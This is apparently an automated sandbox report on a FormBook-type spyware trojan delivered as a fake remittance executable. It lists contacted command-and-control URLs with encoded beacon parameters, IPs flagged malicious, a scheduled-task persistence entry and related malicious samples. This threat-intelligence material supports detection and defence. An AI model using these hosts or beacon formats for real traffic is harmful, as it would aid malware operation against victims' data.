                                        		unknown
                                        http://www.pilatovparts.ru/k2o4/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.adylkerak.ru/1jr4/?4b34ht=kGdd1iddr+mvgzlLI3SGjgxAabUOGsKw2bG4JPXV9hwIwsQyE7CLPYW2F+PDsbjHTDHawkku/URFrqQj7JM/kB2xKVcJ0yqZ4Q9OBe3AFA9XjQjtHcn6JNxir1+KynzC3w==&UxF=2Nflznk0WJ3hjvtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.falldove.top/ewqf/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.retrorocketmodels.com/vtm3/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.btx937.top/gp7t/?4b34ht=rAqEu2gSv2s2Q34sajdUQRUadeB85tkFqSKdenQDQ2DGw2dO3uX5Zw6KDTM8IV3Tf+lQDmhmNxGX2EN4uh2PDjjxVn+OEzZBTy/UzpMaoQhQyJClBqNmt4mNfKWMNb1t7Q==&UxF=2Nflznk0WJ3hjvtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.botcsllc.com/wouf/true
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.lesfleursdeceline.be/11y6/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.lesfleursdeceline.be/11y6/?4b34ht=Dwy6CWGja1kYD5j/NiyuAt+/fS8dx1oXABRd8IB5T1BIX3lRMt9N7dOmg29JYmKAoU96l3n9gZEsdf5amHP+judxC5mcbKzq6E6B/htT/kbgwKzkG09OKna/oGm6dpHmyw==&UxF=2Nflznk0WJ3hjvtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.jl884.vip/viqu/?4b34ht=MVCyVDN3RwNEbgSUD+0xRye29v/XSHfdB7daKMb285I6uLH+in3mV6SqMrakijFPfITBXvDDRnIloAD3dOOGlBaUMS2RVppA4PBahCfW4PrIZhDLLp/ysGvZxQcLTJd5vQ==&UxF=2Nflznk0WJ3hjvtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.jl884.vip/viqu/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.diplocity.org/l1oh/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.duhocvietanh.edu.vn/iqzp/?4b34ht=fu92k1NC4wJFnZcipX/XbPhVhBhXF83hEHBnQGjO4gCDEIQAPcvMGFbAeujwAxJrjpsvX+qRkMbJbRaZT89LHtus1xeGcvR3FY7l2IYkKTCFrV4doYlBH8GHezxeD3NhTg==&UxF=2Nflznk0WJ3hjvtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.tranivel.com/fr5e/false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.cica-rank.com/fx5q/?4b34ht=58zXcaw4QDLVkaL+G0qZOwfYBtfLZlBf9k0Qnw1Zv4bR0GQyFI5ORfMwVsCUT1zQejwif13gDfh0mdA+c9yRzCT9PqSg1LoC16c3+fSR0wz9mE2aSN+j+I+5sdCG7jTd0Q==&UxF=2Nflznk0WJ3hjvtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.equi-sen.ca/oh6m/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.falldove.top/ewqf/?4b34ht=kYShQH1sa3Le60gDrsgCYGFyuVEpRJ0k4IW5QzbfeKprYk61XZyNmSsEdCDrGrgTxI+6jeCx+L1A4qHHQky9AsRR7ruU+KhrWGBfvU9SpfMi+rY6DVY8elzf7b7Bw6Cu6g==&UxF=2Nflznk0WJ3hjvtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.diplocity.org/l1oh/?4b34ht=CLj62WE97PINjru9/2Ua0S4wJ+6clgTBZzFqYLe+Zb/mrkE/j+GqxKOEwyxDIhmnv5tawjcWYXQUR2YOfRR5ys/k8mvsQ8S8w9omXjrMO8RJvp8vgkkqsEYyw/rrHr7WOA==&UxF=2Nflznk0WJ3hjvtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.newmediamonday.com/f1h2/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.botcsllc.com/wouf/?4b34ht=XRItmHXywGWVnqDngINAMvff3IpqjclEV1ySHuRZOTcLzBiyF5+l3MoobodW+p084j4Tu28tOugkX2LbOW2aRLZQ/Vv/K47AM9XykbCYypLB0HUyScM9sRvicmb0LC0c/g==&UxF=2Nflznk0WJ3hjvtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.pilatovparts.ru/k2o4/?4b34ht=qS1OWRHNQ56Cw7+fPD172OEEUbCPY94RPpebPz6xreoqxXbgy7Cu/Z+GqTqWS2Pyzkow4Xyx1yLx23Wbx34O9asPPjW4w1AqTiokyKtl/e0W2Htu8J9pM1VOgBMsot7LIg==&UxF=2Nflznk0WJ3hjvtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.duhocvietanh.edu.vn/iqzp/true
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabwinver.exe, 00000011.00000003.2517734762.00000000080D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://duckduckgo.com/ac/?q=winver.exe, 00000011.00000003.2517734762.00000000080D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://ogp.me/ns#winver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://www.instagram.com/hover_domainswinver.exe, 00000011.00000002.4497860511.0000000007D40000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495925403.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003BF8000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/client/js.polyfill/container-query-polyfill.modern.jswinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/files/2v/2v4/2v414g.css?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/client/img/favicons/sb-favicon.ico?ph=8290e35a9bvFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://events.webnode.com/projects/-/events/winver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=winver.exe, 00000011.00000003.2517734762.00000000080D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.tranivel.comvFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4497473931.000000000597A000.00000040.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.reg.ru/support/#requestwinver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://newmediamonday.comwinver.exe, 00000011.00000002.4495925403.0000000006878000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000004888000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • 1%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.google.comwinver.exe, 00000011.00000002.4495925403.00000000058C4000.00000004.10000000.00040000.00000000.sdmp, winver.exe, 00000011.00000002.4495925403.00000000066E6000.00000004.10000000.00040000.00000000.sdmp, winver.exe, 00000011.00000002.4495925403.0000000006554000.00000004.10000000.00040000.00000000.sdmp, winver.exe, 00000011.00000002.4497860511.0000000007D40000.00000004.00000800.00020000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000046F6000.00000004.00000001.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000004564000.00000004.00000001.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000038D4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2622894066.000000000CE64000.00000004.80000000.00040000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://duhocvietanh.edu.vn/iqzp/?4b34ht=fu92k1NC4wJFnZcipX/XbPhVhBhXF83hEHBnQGjO4gCDEIQAPcvMGFbAeujwwinver.exe, 00000011.00000002.4495925403.0000000005A56000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003A66000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://files.reg.ru/fonts/inter/Inter-Regular.woff)winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.hover.com/domains/resultswinver.exe, 00000011.00000002.4495925403.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003BF8000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/client/img/favicons/sb-favicon-16.svg?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://server27.hosting.reg.ru/managervFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/files/39/396/39634o.js?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwinver.exe, 00000011.00000003.2517734762.00000000080D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://feeds.soundcloud.com/users/soundcloud:users:38128127/sounds.rss4TH HIRE SOA REMITTANCE_USD280,000.exe, GRogNEHvcL.exe.0.drfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000000.00000002.2082504139.0000000002831000.00000004.00000800.00020000.00000000.sdmp, GRogNEHvcL.exe, 0000000A.00000002.2272188144.0000000002BA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://twitter.com/hoverwinver.exe, 00000011.00000002.4497860511.0000000007D40000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495925403.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003BF8000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icowinver.exe, 00000011.00000003.2517734762.00000000080D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/files/19/19m/19mvcd.css?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/files/2r/2rd/2rdzz2.css?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://files.reg.ru/fonts/inter/Inter-Medium.woff2)winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/files/04/04p/04pi85.css?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://2domains.ruwinver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://d1di2lzuh97fh2.cloudfront.netwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/files/17/178/178on3.css?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=winver.exe, 00000011.00000003.2517734762.00000000080D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.ecosia.org/newtab/winver.exe, 00000011.00000003.2517734762.00000000080D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/files/2i/2iw/2iwzy5.css?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://ac.ecosia.org/autocomplete?q=winver.exe, 00000011.00000003.2517734762.00000000080D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/files/3c/3cw/3cwfrk.css?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://files.reg.ru/fonts/inter/Inter-Medium.woff)winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://codepen.io/uzcho_/pens/popular/?grid_type=listwinver.exe, 00000011.00000002.4495925403.0000000006230000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000004240000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://codepen.io/uzcho_/pen/eYdmdXw.csswinver.exe, 00000011.00000002.4495925403.0000000006230000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000004240000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/files/49/49x/49xmuk.css?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.lesfleursdeceline.be/page-not-found-404/vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/files/32/32i/32i65q.css?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://files.reg.ru/fonts/inter/Inter-Regular.woff2)winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.reg.ru/support/hosting-i-servery/moy-sayt-ne-rabotaet/oshibka-404winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=winver.exe, 00000011.00000003.2517734762.00000000080D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/client/img/favicons/sb-favicon.svg?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/files/3f/3f9/3f9vvf.css?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://reg.ru?target=_blankwinver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        183.181.79.111
                                        		www.cica-rank.comJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                        51.195.44.77
                                        		www.adylkerak.ruFrance
                                        		16276OVHFRtrue
                                        65.181.132.158
                                        		e6375a47.jl884.vip.cname.scname.comUnited States
                                        		7859PAIR-NETWORKSUStrue
                                        199.59.243.225
                                        		www.equi-sen.caUnited States
                                        		395082BODIS-NJUStrue
                                        66.29.149.46
                                        		www.falldove.topUnited States
                                        		19538ADVANTAGECOMUStrue
                                        103.138.88.50
                                        		duhocvietanh.edu.vnViet Nam
                                        		45538ODS-AS-VNOnlinedataservicesVNtrue
                                        78.142.211.199
                                        		www.diplocity.orgTurkey
                                        		209853VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLitrue
                                        31.31.196.16
                                        		www.pilatovparts.ruRussian Federation
                                        		197695AS-REGRUtrue
                                        3.125.172.46
                                        		lb.webnode.ioUnited States
                                        		16509AMAZON-02UStrue
                                        173.254.28.213
                                        		newmediamonday.comUnited States
                                        		46606UNIFIEDLAYER-AS-1UStrue
                                        217.70.184.50
                                        		webredir.vip.gandi.netFrance
                                        		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRfalse
                                        3.33.130.190
                                        		retrorocketmodels.comUnited States
                                        		8987AMAZONEXPANSIONGBtrue
                                        216.40.34.41
                                        		www.botcsllc.comCanada
                                        		15348TUCOWSCAtrue

                                        General Information

                                        Joe Sandbox version:40.0.0 Tourmaline
                                        Analysis ID:1447924
                                        Start date and time:2024-05-27 12:41:16 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 11m 47s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:20
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:2
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:4TH HIRE SOA REMITTANCE_USD280,000.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@23/16@15/13
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 98%
                                        • Number of executed functions: 203
                                        • Number of non-executed functions: 300
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                        Warnings

                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtCreateKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        06:42:07API Interceptor2x Sleep call for process: 4TH HIRE SOA REMITTANCE_USD280,000.exe modified
                                        06:42:09API Interceptor36x Sleep call for process: powershell.exe modified
                                        06:42:13API Interceptor2x Sleep call for process: GRogNEHvcL.exe modified
                                        06:43:15API Interceptor9454654x Sleep call for process: winver.exe modified
                                        12:42:10Task SchedulerRun new task: GRogNEHvcL path: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        183.181.79.111bin.exeGet hashmaliciousFormBookBrowse
                                        • www.cica-rank.com/7nwa/
                                        65.181.132.158file.exeGet hashmaliciousFormBookBrowse
                                          199.59.243.225Curriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
                                          • www.friendsfavorites.pet/faug/
                                          PAYMENT COPY.exeGet hashmaliciousFormBookBrowse
                                          • www.chooceseafood.ca/ru1k/?VlEHDVvh=Vfi8NJeG6CY6n5nCPnJqd7XWKv+ZgyRabuT1vrpiYigRQGH5yz+Kvpg97XvPM12AhWFNxFGVyTc+AfyoC76cxpbyACR6Ik9/1bVLBVzltJlAlJSXh5ctyy4=&BHPD=o2nt
                                          Shipping Document.exeGet hashmaliciousFormBookBrowse
                                          • www.drapples.club/opfh/
                                          PAYMENT ADVICE.exeGet hashmaliciousFormBookBrowse
                                          • www.drapples.club/opfh/
                                          COMMANDE.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                          • www.equi-sen.ca/mym9/
                                          USD46k Swift_PDF.exeGet hashmaliciousFormBookBrowse
                                          • www.oooonbpros.space/07eo/
                                          w5c8CHID77.exeGet hashmaliciousUnknownBrowse
                                          • foxhom.com/images/1/filenames.php
                                          SecuriteInfo.com.FileRepMalware.10630.9616.exeGet hashmaliciousUnknownBrowse
                                          • jmp2.in/_tr
                                          file.exeGet hashmaliciousCMSBruteBrowse
                                          • onekisspresave.com/admin/
                                          EST- 250424-0370pdf.exeGet hashmaliciousFormBookBrowse
                                          • www.zwervertjes.be/kr6p/?SZ=6whPVb4fXwSxiNLesp35Ui9eZb1+mPALLZHZ4oP4T+kGHqEWkTaYeh2Pz5F14pYyGsbp3tuvZoWpwX8IAv4QrKf1od27q7lIP9DwW0tSwqpLO4jjjpTYTfDPkUmPOGdz/g==&KZS0W=rx6X7x9
                                          66.29.149.46PAYMENT COPY.exeGet hashmaliciousFormBookBrowse
                                          • www.spotgush.top/ni9v/?VlEHDVvh=1qDi8Q0JYC/+jowmm6vhnz1nUg+FzSnwkBEF+9sZfgdAuqPr9wV9FjKgoqnVlqm9IHxz/wQEEdcJ3vr/ooFd412OQCGzSxMe6/jXu+QS8SjFcrOZORUu8fo=&BHPD=o2nt
                                          Offer Document 23.lnkGet hashmaliciousFormBookBrowse
                                          • www.techchains.info/fo8o/
                                          qtCWL0lgfX.exeGet hashmaliciousFormBookBrowse
                                          • www.techchains.info/fo8o/
                                          Offer Document 24.lnkGet hashmaliciousFormBookBrowse
                                          • www.techchains.info/fo8o/
                                          COMMANDE.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                          • www.spotgush.top/verq/
                                          Swift_USD103,700.exeGet hashmaliciousFormBookBrowse
                                          • www.delvine.life/28ec/
                                          OX-IN-031-17_ JPE.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • www.pulsytech.xyz/g0dh/
